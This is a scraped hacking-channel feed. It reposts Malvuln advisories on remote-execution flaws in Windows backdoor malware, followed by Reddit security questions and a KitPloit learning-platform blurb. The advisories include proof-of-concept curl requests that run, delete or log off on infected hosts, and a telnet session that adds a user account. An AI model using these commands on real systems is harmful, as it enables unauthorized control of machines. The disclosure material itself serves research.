Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.BluanWeb Remote Code Execution

https://3.bp.blogspot.com/-IdvtX_t6dWw/WWlvCDhzudI/AAAAAAAAIKg/xbP9RqLektQzycUDwAlgxfpiSc2tZZpAwCLcBGAs/s1600/h126.png
Backdoor.Win32.BluanWeb malware suffers from an unauthenticated remote code execution vulnerability.

MD5 | f62cdcd1d10f8510c404a525e12f639c

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/30903ccbc6747c0da5a2775884b78def.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BluanWeb
Vulnerability: Unauthenticated Remote Code Execution
Description: The malware "BlueAngel For WebServer" by "leonshoh" listens on TCP port 80. The malware provides an HTML web-interface that exposes the entire system and creates HTML links to delete or run programs.

E.g.

[$Recycle.Bin]
[Boot]
bootmgr [删除] [运行]
BOOTNXT [删除] [运行]
BOOTSECT.BAK [删除] [运行]
[Documents and Settings]
[dump]
pagefile.sys [删除] [运行]
[PerfLogs]
[Program Files]
[Program Files (x86)]
[ProgramData]
[Recovery]
swapfile.sys [删除] [运行]
[System Volume Information]
[Users]
[Windows]

Translated from Chinese:

bootmgr [delete] [run]
BOOTNXT [delete] [run]
BOOTSECT.BAK [delete] [run]
[Documents and Settings]
[dump]
pagefile.sys [delete] [run]
[PerfLogs]
[Program Files]
[Program Files (x86)]
[ProgramData]
[Recovery]
swapfile.sys [delete] [run]

The HREF is like "run_EXECUTABLE". Third-party attackers who can reach infected hosts can make HTTP GET request appending any executable name.

Family:BluanWeb
Type: PE32
MD5: 30903ccbc6747c0da5a2775884b78def
Vuln ID: MVID-2022-0504
Disclosure: 03/03/2022
Exploit/PoC:
curl http://x.x.x.x/run_3rd_party_malware
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.RemoteNC.beta4 Remote Command Execution

https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
Backdoor.Win32.RemoteNC.beta4 malware suffers from an unauthenticated remote command execution vulnerability.

MD5 | cb83cd130c3224c49aa56f13dd6c99a0

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/2862de561d91eedb265df4ae9b0fc872.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.RemoteNC.beta4
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 49941. Third-party attackers who can reach an infected host can execute any OS commands hijacking taking over the system.
Family: RemoteNC
Type: PE32
MD5: 2862de561d91eedb265df4ae9b0fc872
Vuln ID: MVID-2022-0507
Disclosure: 03/03/2022

Exploit/PoC:
c:\>telnet.exe x.x.x.x 49941

===============Meteor Soft Labs. 1995-2001 All Rights Reserved.===============
=========Written by AssHoles, Server Edition ilovecandy@21cn.com==============
Microsoft Windows [Version 10.0.16299.309]
Slackbot:wwhhooaammii
desktop-2c3iqho\victim
Slackbot:ccaallcc
Slackbot:nneett uusseerr hhyypp33rrlliinnxx 666666 //aadddd
The command completed successfully.
Slackbot:nneett uusseerr
User accounts for \\DESKTOP-2C3IQHO
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
hyp3rlinx Victim WDAGUtilityAccount
The command completed successfully.
Slackbot:
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.BluanWeb Remote Command Execution

https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Backdoor.Win32.BluanWeb malware suffers from an unauthenticated remote command execution vulnerability.

MD5 | 40bcaa31941efa6af820e0c7cec9b0d1

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/30903ccbc6747c0da5a2775884b78def_C.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BluanWeb
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware "BlueAngel For WebServer" by "leonshoh" listens on TCP port 80. The malware provides an HTML web-interface that exposes the entire system and creates HTML page with links to delete, logoff or exit the system. Third-party attackers who can reach an infected host can make HTTP GET request to execute commands made available by the backdoor.

[固定磁盘C]
卷标名:
文件名长度 255
文件系统 NTFS
磁盘大小 3625.000000 MB
剩余空间 3284.000000 MB
[光盘D]

[Fixed Disk C]
Volume label name
Filename length 255
File system NTFS
Disk size 3625.000000 MB
Free space 3284.000000 MB
[Disc D]

Family:BluanWeb
Type: PE32
MD5: 30903ccbc6747c0da5a2775884b78def
Vuln ID: MVID-2022-0506
Disclosure: 03/03/2022

Exploit/PoC:
1) delete any file
http://x.x.x.x/unlink_C:/Boot/BCD.LOG

2) DOS backdoor
curl http://x.x.x.x/exit

3) sign out the victim machine
curl http://x.x.x.x/logoff

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
DORA's Global Reach and Why Enterprises Need to Prepare

The new EU regulation is a response to the rise of ransomware attacks and other new cyberthreats that have proliferated in the wake of the global pandemic.
hacking: security in practice
Can anyone tell me more about NB65?

Looking for any information about the origin of this group. My sense is that it is basically a group of people (or maybe a single person) that basically started as a reaction to the war in Ukraine. I guess my question for you in-the-knowers would be: - Any history for this group prior to early-mid feb? - Are these hacks feasible without significant capital being involved? (Another way of asking if there might be state involvement) - Is it possible that these “hacks” are fake? Huge propaganda value so I think it’s a fair question. - Do we have any read on where these individuals might be located?

Any additional interesting info is definitely welcome. I’m researching this as part of a much larger fictional story.

The possibility of a very covertly state or multi-state sponsored hacking group is a very interesting plot point to me. That’s almost certainly the approach I’d be taking . Any examples of that would also be helpful. Im also interested in how the “hacked” party might be able to realistically identify if a specific hack has state ties. Feel free to speak in full technical lingo, I can do my research.

submitted by /u/PharmADD
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
An Interesting Article Concerning History

An article from Gizmodo about where two from The Inner Circle are doing today.

From The Inner Circle

submitted by /u/infiltrator86
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
horsex5? is there such thing?

Is there any tool/software/exploit/script/language or something by that name? supposedly to aide in the linking of emails to accounts of some sites. I say is BS, but well, I may be wrong.

submitted by /u/arana1
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Threat intelligence reports?

Does anyone have a good monthly or weekly threat intelligence report source? Trying to do more threat Intel work

submitted by /u/The_batman1993
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
HaccTheHub - Open Source Self-Hosted Cyber Security Learning Platform

https://blogger.googleusercontent.com/img/a/AVvXsEgt3A6sqQujXHGK0mJDt3xJFlItEGEBDR59PKduk63V63aaKn-3yqcXqCRBgp0Ce8UtYnOizvlnqfsookP4lxVwW8B1gvGiYmtU06Kp-LE3psbwY5KIJkZcu8tSRnHoDfIzL7m3iK-8Q9JfLzrtL2r6ciWEX3ynqhJf5D37-w9PehTSBhHwY8J2lfOP=w400-h400 Open source self-hosted cyber security learning platform About The Projecthttps://blogger.googleusercontent.com/img/a/AVvXsEjJ2o8icTol11dStT11yOJGlfVv_QvBM3lfs0L9Z0TGhS_J3117Gykmu9PidmDEAw0G7rIqArVxFBpC-EjWoLfq48w6fnU3BV0LW1lAYXwv5r15caHgdQqJQhFpFDH9JcMWOSa8HgdpFpXkxYzIw8XQI33tTprqNNmFKq8ufW2165T4JfM0wVSKzr3R=w640-h360 HaccTheHub is an open source project that provides cyber security

The HaccTheHub system consists of 3 main parts:

* Docker: containing all of the boxes creating the environment in which we'll be learning on.
* The backend: controlling Docker and responsible for starting/destroying indivisual box in the system and managing the networking that joins them into a unified system.
* The frontend: GUI for the user to interact with the system via their web browser. Built With* Flask-RESTX
* Next.js Getting StartedTo get HaccTheHub up and running, you would need to setup the followings Prerequisites* Docker (refer to Docker's Documentation for setup)
* Python 3 (Download) or just install python3from your package manager.
* Node.js 16 (Download) or use your package manager Installation1. Clone the repo git clone https://github.com/J4FSec/HaccTheHub.git1. Install dependencies for the backend cd HaccTheHub/backend
python3 -m pip install -r requirements.txt
1. And dependencies for the frontend cd ../client
npm install
Usage1. Start up Docker
2. Start the backend cd ../backend
python3 main.py
1. And the frontend cd ../client
npm start
The WebUI should now be accessible via http://localhost:8080. ContributingAny contributions are much appreciated. If you have a suggestion, please fork the repo and create a pull request. You can also open an issue with the tag enhancement.

1. Fork the project
2. Create a new branch for the new feature (git checkout -b feature/EpicFeature)
3. Commit your changes (git commit -m "Add EpicFeature")
4. Push to the branch (git push origin feature/EpicFeature)
5. Open a pull request. LicenseDistributed under the GNU Affero General Public License v3.0. See LICENSEfor more information. Authors* Dong Duong (@Cu64) - dongduongdev@gmail.com
* watch-dog-man (@watch-dog-man) Contributors* @Nehozun - Completely re-made the frontend. We'd be lost without him. AcknowledgementDownload HaccTheHub

___________________________
@hacking_Attack
@Hacking_Video